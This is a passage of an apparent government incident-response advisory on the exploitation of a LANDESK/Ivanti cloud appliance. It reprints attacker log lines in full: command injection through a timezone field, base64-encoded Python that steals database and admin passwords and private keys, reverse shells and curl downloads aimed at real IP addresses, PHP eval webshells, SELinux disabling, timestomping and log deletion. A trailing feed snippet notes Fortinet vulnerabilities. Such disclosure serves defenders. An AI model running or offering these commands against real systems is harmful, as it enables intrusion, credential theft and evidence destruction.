gsbadmin”’.format(p, msg))try:  r = max([os.path.join(d, f) for f in os.listdir(d) if os.path.isfile(os.path.join(d, f))], key=os.path.getmtime)except:  r = Nonewith open(“/opt/landesk/broker/broker.conf”) as f:  dbpwd = re.findall(“PGSQL_PW=(.*)”, f.read())[0]if r:  p = os.popen(“export PGPASSWORD={};echo SELECT passwd FROM user_info WHERE username=\\’admin\\’ | psql -d brokerdb -U gsbadmin -h localhost”.format(dbpwd)).read().split(“\n”)[-4].strip().split(‘:’)  os.system(“tar zxvf {}”.format(r))  while True:      for f in os.listdir(‘.’):          if re.match(“php\w{6}”, f):              os.chmod(f, 0o777)              m = os.popen(“./{} {} {} {} root/.certs/{}.key {}”.format(f, p[4], p[5], p[6], p[1], p[1])).read().strip()              if m:                  set_msg(dbpwd, “PASSWORD”, m)                  time.sleep(30)                  set_msg(dbpwd)                  exit()else:  set_msg(dbpwd, ‘ERROR’, ‘NO BACKUP’)| /usr/bin/base64 -d | python||’ where username=’admin'”|psql -d brokerdb -U gsbadmin;’ (1)} {Sep  5 22:22:06 REDACTED gsb[9367]: /etc/php.inirewritten with new timezone: ‘;export PGPASSWORD=`cat /opt/landesk/broker/broker.conf | grep PGSQL_PW | cut -d ‘=’ -f2-`;echo “update user_info set organization=’||/usr/bin/echo import os, re, base64, timeos.chdir(“/tmp”)d = “/backups”def set_msg(p, t=”, m=”):  if t and m:      msg = ‘AA{}:{}BB’.format(t, base64.b64encode(m.encode()).decode())  else:      msg = ”  os.system(”’export PGPASSWORD={};echo “update user_info set organization='{}’ where username=’admin'”|psql -d brokerdb -U gsbadmin”’.format(p, msg))try:  r = max([os.path.join(d, f) for f in os.listdir(d) if os.path.isfile(os.path.join(d, f))], key=os.path.getmtime)except:  r = Nonewith open(“/opt/landesk/broker/broker.conf”) as f:  dbpwd = re.findall(“PGSQL_PW=(.*)”, f.read())[0]if r:  p = os.popen(“export PGPASSWORD={};echo SELECT passwd FROM user_info WHERE username=\\’admin\\’ | psql -d brokerdb -U gsbadmin -h localhost”.format(dbpwd)).read().split(“\n”)[-4].strip().split(‘:’)  os.system(“tar zxvf {}”.format(r))  while True:      for f in os.listdir(‘.’):          if re.match(“php\w{6}”, f):              os.chmod(f, 0o777)              m = os.popen(“./{} {} {} {} root/.certs/{}.key {}”.format(f, p[4], p[5], p[6], p[1], p[1])).read().strip()              if m:                  set_msg(dbpwd, “PASSWORD”, m)                  time.sleep(30)                  set_msg(dbpwd)                  exit()else:  set_msg(dbpwd, ‘ERROR’, ‘NO BACKUP’)| /usr/bin/base64 -d | python||’ where username=’admin'”|psql -d brokerdb -U gsbadmin;’ (1)} {Sep  6 02:39:11 REDACTED gsb[21266]: /etc/php.inirewritten with new timezone: ‘;/usr/bin/echo import os, re, base64, timeos.chdir(“/tmp”)d = “/backups”def set_msg(p, t=”, m=”):  if t and m:      msg = ‘AA{}:{}BB’.format(t, base64.b64encode(m.encode()).decode())  else:      msg = ”  os.system(”’export PGPASSWORD={};echo “update user_info set organization='{}’ where username=’admin'”|psql -d brokerdb -U gsbadmin”’.format(p, msg))try:  r = max([os.path.join(d, f) for f in os.listdir(d) if os.path.isfile(os.path.join(d, f))], key=os.path.getmtime)except:  r = Nonewith open(“/opt/landesk/broker/broker.conf”) as f:  dbpwd = re.findall(“PGSQL_PW=(.*)”, f.read())[0]if r:  p = os.popen(“export PGPASSWORD={};echo SELECT passwd FROM user_info WHERE username=\\’admin\\’ | psql -d brokerdb -U gsbadmin -h localhost”.format(dbpwd)).read().split(“\n”)[-4].strip().split(‘:’)  os.system(“tar zxvf {}”.format(r))  while True:      for f in os.listdir(‘.’):          if re.match(“php\w{6}”, f):              os.chmod(f, 0o777)              m = os.popen(“./{} {} {} {} root/.certs/{}.key {}”.format(f, p[4], p[5], p[6], p[1], p[1])).read().strip()              if m:                  set_msg(dbpwd, “PASSWORD”, m)                  time.sleep(30)                  set_msg(dbpwd)                  exit()else:  set_msg(dbpwd, ‘ERROR’, ‘NO BACKUP’)  | /usr/bin/base64 -d | python;’ (1)} {Sep  6 03:03:44 REDACTED gsb[11427]: /etc/php.inirewritten with new timezone: ‘;bash /tmp/Xa27efd2.tmp;’ (1)} {Sep  8 05:18:35 REDACTED gsb[5132]: /etc/php.inirewritten with new timezone: ‘;/sbin/backuptool –backup;’ (1)} {Sep  8 05:19:34 REDACTED gsb[5325]: /etc/php.inirewritten with new timezone: ‘;/usr/bin/echo import os, re, base64, timeos.chdir(“/tmp”)d = “/backups”def set_msg(p, t=”, m=”):  if t and m:      msg = ‘AA{}:{}BB’.format(t, base64.b64encode(m.encode()).decode())  else:      msg = ”  os.system(”’export PGPASSWORD={};echo “update user_info set organization='{}’ where username=’admin'”|psql -d brokerdb -U gsbadmin”’.format(p, msg))try:  r = max([os.path.join(d, f) for f in os.listdir(d) if os.path.isfile(os.path.join(d, f))], key=os.path.getmtime)except:  r = Nonewith open(“/opt/landesk/broker/broker.conf”) as f:  dbpwd = re.findall(“PGSQL_PW=(.*)”, f.read())[0]if r:  p = os.popen(“export PGPASSWORD={};echo SELECT passwd FROM user_info WHERE username=\\’admin\\’ | psql -d brokerdb -U gsbadmin -h localhost”.format(dbpwd)).read().split(“\n”)[-4].strip().split(‘:’)  os.system(“tar zxvf {}”.format(r))  while True:      for f in os.listdir(‘.’):          if re.match(“php\w{6}”, f):              os.chmod(f, 0o777)              m = os.popen(“./{} {} {} {} root/.certs/{}.key {}”.format(f, p[4], p[5], p[6], p[1], p[1])).read().strip()              if m:                  set_msg(dbpwd, “PASSWORD”, m)                  time.sleep(30)                  set_msg(dbpwd)                  exit()else:  set_msg(dbpwd, ‘ERROR’, ‘NO BACKUP’)   | /usr/bin/base64 -d | python;’ (1)} {Sep  8 10:37:35 REDACTED gsb[6196]: /etc/php.inirewritten with new timezone: ‘;nc REDACTED80 -ssl -e /bin/bash;’ (1)} {Sep  8 10:40:38 REDACTED gsb[8758]: /etc/php.inirewritten with new timezone: ‘;curl https://gggg.oyr2ohrm.eyes.sh/;’ (1)} {Sep  8 10:41:35 REDACTED gsb[7475]: /etc/php.inirewritten with new timezone: ‘;curl 98.98.54.209/a.sh -o /dev/shm/a.sh;’ (1)} {Sep  8 13:10:37 REDACTED gsb[22555]: /etc/php.inirewritten with new timezone: ‘;nc REDACTED80 –ssl -e /bin/bash;’ (1)} {Sep  8 13:21:06 REDACTED gsb[24954]: /etc/php.inirewritten with new timezone: ‘;nc REDACTED80 –ssl -e /bin/bash;’ (1)} {Sep  8 20:23:14 REDACTED gsb[1899]: /etc/php.inirewritten with new timezone: ‘;export PGPASSWORD=`cat /opt/landesk/broker/broker.conf | grep PGSQL_PW | cut -d ‘=’ -f2-`;echo “update user_info set organization=’||/usr/bin/echo import os, re, base64, timeos.chdir(“/tmp”)d = “/backups”def set_msg(p, t=”, m=”):  if t and m:      msg = ‘AA{}:{}BB’.format(t, base64.b64encode(m.encode()).decode())  else:      msg = ”  os.system(”’export PGPASSWORD={};echo “update user_info set organization='{}’ where username=’admin'”|psql -d brokerdb -U gsbadmin”’.format(p, msg))try:  r = max([os.path.join(d, f) for f in os.listdir(d) if os.path.isfile(os.path.join(d, f))], key=os.path.getmtime)except:  r = Nonewith open(“/opt/landesk/broker/broker.conf”) as f:  dbpwd = re.findall(“PGSQL_PW=(.*)”, f.read())[0]if r:  p = os.popen(“export PGPASSWORD={};echo SELECT passwd FROM user_info WHERE username=\\’admin\\’ | psql -d brokerdb -U gsbadmin -h localhost”.format(dbpwd)).read().split(“\n”)[-4].strip().split(‘:’)  os.system(“tar zxvf {}”.format(r))  while True:      for f in os.listdir(‘.’):          if re.match(“php\w{6}”, f):              os.chmod(f, 0o777)              m = os.popen(“./{} {} {} {} root/.certs/{}.key {}”.format(f, p[4], p[5], p[6], p[1], p[1])).read().strip()              if m:                  set_msg(dbpwd, “PASSWORD”, m)                  time.sleep(30)                  set_msg(dbpwd)                  exit()else:  set_msg(dbpwd, ‘ERROR’, ‘NO BACKUP’)   | /usr/bin/base64 -d | python||’ where username=’admin'”|psql -d brokerdb -U gsbadmin;’ (1)} {Sep 10 04:36:30 REDACTED gsb[16012]: /etc/php.inirewritten with new timezone: ‘;/usr/bin/echo python -c ‘import socket,os,pty;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((“45.33.101.53”,443));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn(“/bin/sh”)’== | /usr/bin/base64 -d | /bin/bash;’ (1)} {Sep 10 11:48:32 csa gsb[6829]: /etc/php.inirewritten with new timezone: ‘;/bin/python -c ‘importsocket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((“156.234.193.18”,44345));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([“/bin/bash”,”-i”]);’;’ (1)} {Sep 10 05:33:42 REDACTED gsb[17292]: /etc/php.inirewritten with new timezone: ‘;/usr/bin/echo import os, re, timeos.chdir(“/tmp”)d = “/backups/backup-09-01-2024_010101.tar.gz”with open(“/opt/landesk/broker/broker.conf”) as f:  dbpwd = re.findall(“PGSQL_PW=(.*)”, f.read())[0]if os.path.exists(d):  os.system(“tar zxf {}”.format(d))  pwd = os.popen(“export PGPASSWORD={};echo SELECT username,passwd FROM user_info | psql -d brokerdb -U gsbadmin -h localhost”.format(dbpwd)).read().strip()  p = pwd.split(‘:’)  k = os.popen(“cat root/.certs/{}.0″.format(p[1])).read().strip()  os.system(”’export PGPASSWORD={};echo “INSERT INTO blockedcerts (blockedcerts_idn, core, hash, description, created) VALUES (1, ‘{}’, ‘1’, ‘{}’, ‘2024-03-13 05:10:16.926012′)”|psql -d brokerdb -U gsbadmin”’.format(dbpwd, k[0:200], k[200:700]))  os.system(”’export PGPASSWORD={};echo “INSERT INTO blockedcerts (blockedcerts_idn, core, hash, description, created) VALUES (2, ‘{}’, ‘2’, ‘{}’, ‘2024-03-13 05:10:16.926012′)”|psql -d brokerdb -U gsbadmin”’.format(dbpwd, k[700:900], k[900:]))  os.system(”’export PGPASSWORD={};echo “INSERT INTO blockedcerts (blockedcerts_idn, core, hash, description, created) VALUES (3, ‘{}’, ‘3’, ‘{}’, ‘2024-03-13 05:10:16.926012′)”|psql -d brokerdb -U gsbadmin”’.format(dbpwd, pwd[0:200], pwd[200:700]))  time.sleep(60)  os.system(”’export PGPASSWORD={};echo “DELETE FROM blockedcerts”|psql -d brokerdb -U gsbadmin”’.format(dbpwd))  os.system(“rm -rdf *;rm -rf *”)== | /usr/bin/base64 -d | python;’ (1)} Appendix B: Sudo Commands See Table 14 for a list of known sudo commands executed by the threat actors. Command Use sudo:  nobody : user NOT in sudoers ; TTY=unknown ; PWD=/opt/landesk/broker/webroot/gsb ; USER=root ; COMMAND=/opt/landesk/ldms/LDClient/ldpclient -i ;export PGPASSWORD=`cat /opt/landesk/broker/broker.conf | grep PGSQL_PW | cut -d ‘=’ -f2-`;echo “update user_info set organization=’||/usr/bin/echo aW1wb3J0IG9zLCByZSwgYmFzZTY0LCB0aW1lCm9zLmNoZGlyKCIvdG1wIikKZCA9ICIvYmFja3VwcyIKZGVmIHNldF9tc2cocCwgdD0nJywgbT0nJyk6CiAgICBpZiB0IGFuZCBtOgogICAgICAgIG1zZyA9ICdBQXt9Ont9QkInLmZvcm1hdCh0LCBiYXNlNjQuYjY0ZW5jb2RlKG0uZW5jb2RlKCkpLmRlY29kZSgpKQogICAgZWxzZToKICAgICAgICBtc2cgPSAnJwogICAgb3Muc3lzdGVtKCcnJ2V4cG9ydCBQR1BBU1NXT1JEPXt9O2VjaG8gInVwZGF0ZSB1c2VyX2luZm8gc2V0IG9yZ2FuaXphdGlvbj0ne30nIHdoZXJlIHVzZXJuYW1lPSdhZG1pbicifHBzcWwgLWQgYnJva2VyZGIgLVUgZ3NiYWRtaW4nJycuZm9ybWF0KHAsIG1zZykpCnRyeToKICAgIHIgPSBtYXgoW29zLnBhdGguam9pbihkLCBmKSBmb3IgZiBpbiBvcy5saXN0ZGlyKGQpIGlmIG9zLnBhdGguaXNmaWxlKG9zLnBhdGguam9pbihkLCBmKSldLCBrZXk9b3MucGF0aC5nZXRtdGltZSkKZXhjZXB0OgogICAgciA9IE5vbmUKd2l0aCBvcGVuKCIvb3B0L2xhbmRlc2svYnJva2VyL2Jyb2tlci5jb25mIikgYXMgZjoKICAgIGRicHdkID0gcmUuZmluZGFsbCgiUEdTUUxfUFc9KC4qKSIsIGYucmVhZCgpKVswXQppZiByOgogICAgcCA9IG9zLnBvcGVuKCJleHBvcnQgUEdQQVNTV09SRD17fTtlY2hvIFNFTEVDVCBwYXNzd2QgRlJPTSB1c2VyX2luZm8gV0hFUkUgdXNlcm5hbWU9XFwnYWRtaW5cXCcgfCBwc3FsIC1kIGJyb2tlcmRiIC1VIGdzYmFkbWluIC1oIGxvY2FsaG9zdCIuZm9ybWF0KGRicHdkKSkucmVhZCgpLnNwbGl0KCJcbiIpWy00XS5zdHJpcCgpLnNwbGl0KCc6JykKICAgIG9zLnN5c3RlbSgidGFyIHp4dmYge30iLmZvcm1hdChyKSkKICAgIHdoaWxlIFRydWU6CiAgICAgICAgZm9yIGYgaW4gb3MubGlzdGRpcignLicpOgogICAgICAgICAgICBpZiByZS5tYXRjaCgicGhwXHd7Nn0iLCBmKToKICAgICAgICAgICAgICAgIG9zLmNobW9kKGYsIDBvNzc3KQogICAgICAgICAgICAgICAgbSA9IG9zLnBvcGVuKCIuL3t9IHt9IHt9IHt9IHJvb3QvLmNlcnRzL3t9LmtleSB7fSIuZm9ybWF0KGYsIHBbNF0sIHBbNV0sIHBbNl0sIHBbMV0sIHBbMV0pKS5yZWFkKCkuc3RyaXAoKQogICAgICAgICAgICAgICAgaWYgbToKICAgICAgICAgICAgICAgICAgICBzZXRfbXNnKGRicHdkLCAiUEFTU1dPUkQiLCBtKQogICAgICAgICAgICAgICAgICAgIHRpbWUuc2xlZXAoMjQwKQogICAgICAgICAgICAgICAgICAgIHNldF9tc2coZGJwd2QpCiAgICAgICAgICAgICAgICAgICAgZXhpdCgpCmVsc2U6CiAgICBzZXRfbXNnKGRicHdkLCAnRVJST1InLCAnTk8gQkFDS1VQJykKICAgIAogICAgCg== | /usr/bin/base64 -d | python||’ where username=’admin'”|psql -d brokerdb -U gsbadmin; Updates the “organization” field of the “admin” account in the PGSQL database with python script decoded from base64.  The python script decompresses the latest backup of the PGSQL database and extracts the password for the gsbadmin account to access the database. nobody : user NOT in sudoers ; TTY=unknown ; PWD=/usr/bin ; USER=root ; COMMAND=/sbin/setenforce 0 Temporarily disables SELinux. sudo: admin : TTY=unknown ; PWD=/tmp ; USER=root ; COMMAND=/bin/sh -c echo REDACTED_BASE64_PASSWORD | base64 >/opt/landesk/broker/webroot/gsb/site.cnf Exfiltrates credentials and places them in a site.cnf webfile. sudo: admin : TTY=unknown ; PWD=/tmp ; USER=root ; COMMAND=/bin/sh -c echo PD9waHAgZXZhbCgkX1BPU1RbImNiNzg2OGM0NjA zNTQ4NTdiNzE5MjA0ZTI3NjZlZGJlIl0pOw== | base64 -d >/opt/landesk/broker/webroot/gsb/view.php Creates a webshell at view.php. sudo: gsbadmin : TTY=unknown ; PWD=/opt/landesk/broker/webroot/gsb ; USER=root ; COMMAND=/subin/tripwire –update ;/usr/bin/echo ZWNobyAiPD9waHAgc3lzdGVtKCcvYmluL3N1ZG8gJy4Gq FwkX1JFUVVFU1RbJ2EnXSk7IiA+IC9vcHQvbGFuZGVzay9icm 9rZXIvd2Vicm9vdC9nc2IvaGVscC5waHA= | /usr/bin/base64 -d | /bin/bash; Creates a webshell at help.php. sudo: gsbadmin : TTY=unknown ; PWD=/opt/landesk/broker/webroot/gsb ; USER=root ; COMMAND=/bin/sh -c cd /opt/landesk/broker/webroot/gsb/;sed -i ‘s/setPhpTimeZone($TIMEZONE)/\/\/ setPhpTimeZone()/g’ /opt/landesk/broker/webroot/gsb/DateTimeTab.php Comments out the function setPhpTimeZone in DateTimeTab.php that logs the full exploit command. sudo: gsbadmin : TTY=unknown ; PWD=/opt/landesk/broker/webroot/gsb ; USER=root ; COMMAND=/bin/sh -c cd /opt/landesk/broker/webroot/gsb/;sed -i ‘s/setSystemTimeZone( $TIMEZONE )/\/\/ setSystemTimeZone( $TIMEZONE )/g’ /opt/landesk/broker/webroot/gsb/DateTimeTab.php Comments out the vulnerable function setSystemTimeZone in DateTimeTab.php. sudo: gsbadmin : TTY=unknown ; PWD=/opt/landesk/broker/webroot/gsb ; USER=root ; COMMAND=/bin/sh -c cd /opt/landesk/broker/webroot/gsb/;sed -i ‘s/GSB main page/GSB main page\neval($_POST[“in39112cnnpkyc1os01q34gp6r60akgi”])\;/g’ /opt/landesk/broker/webroot/client/index.php Adds a webshell into index.php. sudo: gsbadmin : TTY=unknown ; PWD=/opt/landesk/broker/webroot/gsb ; USER=root ; COMMAND=/bin/sh -c cd /opt/landesk/broker/webroot/gsb/;sed -i ‘s/$canvas_height = 600;/$canvas_height = 600;\n\teval($_POST[“in39112cnnpkyc1os01q34gp6r60akgi”]);/’ /opt/landesk/broker/webroot/gsb/style.php Adds a webshell into style.php. sudo: gsbadmin : TTY=unknown ; PWD=/opt/landesk/broker/webroot/gsb ; USER=root ; COMMAND=/bin/sh -c cd /opt/landesk/broker/webroot/gsb/;touch -r /opt/landesk/broker/webroot/client/about.php /opt/landesk/broker/webroot/client/index.php Timestomping attempt to change the access and modification of time of index.php. sudo: gsbadmin : TTY=unknown ; PWD=/opt/landesk/broker/webroot/gsb ; USER=root ; COMMAND=/bin/sh -c cd /opt/landesk/broker/webroot/gsb/;touch -r /opt/landesk/broker/webroot/client/about.php /opt/landesk/broker/webroot/gsb/style.php Timestomping attempt to change the access and modification time of style.php sudo: gsbadmin : TTY=unknown ; PWD=/opt/landesk/broker/webroot/gsb ; USER=root ; COMMAND=/bin/sh -c cd /opt/landesk/broker/webroot/gsb/;touch -r /opt/landesk/broker/webroot/client/about.php /opt/landesk/broker/webroot/gsb/DateTimeTab.php Timestomping attempt to change the access and modification time of DateTimeTab.php. sudo: gsbadmin : TTY=unknown ; PWD=/opt/landesk/broker/webroot/gsb ; USER=root ; COMMAND=/bin/sh -c cd /opt/landesk/broker/webroot/gsb/;rm /opt/landesk/broker/webroot/gsb/help.php Timestomping attempt to change the access and modification time of help.php sudo: gsbadmin : TTY=unknown ; PWD=/opt/landesk/broker/webroot/gsb ; USER=root ; COMMAND=/bin/sh -c cd /opt/landesk/broker/webroot/gsb/;rm /var/log/messages Removes evidence. sudo: gsbadmin : TTY=unknown ; PWD=/opt/landesk/broker/webroot/gsb ; USER=root ; COMMAND=/bin/sh -c cd /opt/landesk/broker/webroot/gsb/;rm /opt/landesk/broker/webroot/gsb/site.cnf Removes site.cnf file (exfiltrated credentials). sudo: gsbadmin : TTY=unknown ; PWD=/opt/landesk/broker/webroot/gsb ; USER=root ; COMMAND=/bin/sh -c cd /opt/landesk/broker/webroot/gsb/;rm /opt/landesk/broker/webroot/client/client.php Removes one of the original webshells. sudo: gsbadmin : TTY=unknown ; PWD=/opt/landesk/broker/webroot/gsb ; USER=root ; COMMAND=/bin/sh -c cd /opt/landesk/broker/webroot/gsb/;rm /opt/landesk/broker/webroot/gsb/view.php Removes one of the original webshells.

  • 2025-003: Critical Vulnerabilities in Fortinet Products
    by Latest publications of type Security Advisories on 15 Gennaio 2025 at 1:26 pm

    On January 14, Fortinet released and updated several security advisories addressing multiple vulnerabilities ranging from low to critical severity. At least one critical vulnerability is known to be exploited in the wild. It recommended updating as soon as possible, and if not possible, at least applying mitigations.